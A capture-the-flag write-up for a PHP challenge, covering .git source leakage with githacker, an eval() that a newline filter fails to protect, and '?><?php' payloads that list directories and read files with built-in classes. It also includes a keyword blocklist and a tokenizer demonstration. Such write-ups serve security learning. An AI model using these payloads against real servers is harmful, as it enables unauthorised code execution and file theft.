2025 first-half competition

1phpms

A directory scan reveals an exposed .git directory; pull it down with githacker.

githacker --url http://5b45730d-cfab-4b87-bfa1-29a046ca06c4.node5.buuoj.cn:81/.git/ --output-folder C:\Users\25050\Downloads

The source of index.php turns up in the commit history:

<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
echo ':(';
}else{
eval("#$shell");
}
?>
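
Why the newline check does not confine `$shell` to the `#` comment: a PHP single-line comment ends at a line break or at a closing tag `?>`, and only the line break is filtered. The following is an added example, not part of the challenge code; `passes_newline_filter` and `stays_inside_comment` are hypothetical helpers and the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's code. Sample inputs are constructed.

// The filter exactly as index.php applies it: reject only CR and LF.
function passes_newline_filter(string $input): bool
{
    return preg_match('/\x0a|\x0d/', $input) !== 1;
}

// Hypothetical helper: tokenize what eval("#$input") would parse and report
// whether everything after the open tag is one single comment token.
function stays_inside_comment(string $input): bool
{
    $tokens = token_get_all('<?php #' . $input);
    array_shift($tokens); // drop the T_OPEN_TAG we prepended for the tokenizer
    if (count($tokens) !== 1) {
        return false;
    }
    return is_array($tokens[0]) && $tokens[0][0] === T_COMMENT;
}

$samples = [
    'plain text'         => 'just a note',
    'newline (filtered)' => "note\necho 1;",
    'closing tag'        => "?><?php echo 'outside the comment';",
];

foreach ($samples as $label => $input) {
    printf(
        "%-20s filter=%-6s comment-only=%s\n",
        $label,
        passes_newline_filter($input) ? 'pass' : 'block',
        stays_inside_comment($input) ? 'yes' : 'no'
    );
}

// Any input with filter=pass and comment-only=no reaches eval() as live code.
// The fix is to remove eval() on request data, not to extend the blacklist.
```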


Many functions turn out to be disabled, but PHP's built-in classes are still usable.

shell=?><?php $a=new DirectoryIterator(".");
foreach($a as $f){
echo $f." " ;
};?>

//no_careee.php .htaccess 3.php .git index.php 2.php 1.php
shell=?><?php $a=new SplFileObject('no_careee.php');
foreach($a as $a)
{echo $a."<br>";
};?>
//no_careee.php
<?php
function block_if_dangerous_code($input) {
// Define the regex: match function names, case-insensitive, capture the matched text
if (preg_match('/\b(eval|include|include_once|require|require_once)\b/i', $input, $match)) {
$matched_func = $match[1]; // the captured function name
echo "
";
echo "Warning: {$matched_func} has been disabled for security reasons in /var/www/html/index.php(6) : eval()'d code on line 1
";
exit;
}
}

// Check the GET parameter shell
if (isset($_GET['shell'])) {
block_if_dangerous_code($_GET['shell']);
}

?>
//index.php
<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
echo ':(';
}else{
eval("#$shell");
}
?>

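A file named hintflag can be seen in the root directory, but accessing it directly returns a permission error, and I did not find a way to escalate privileges.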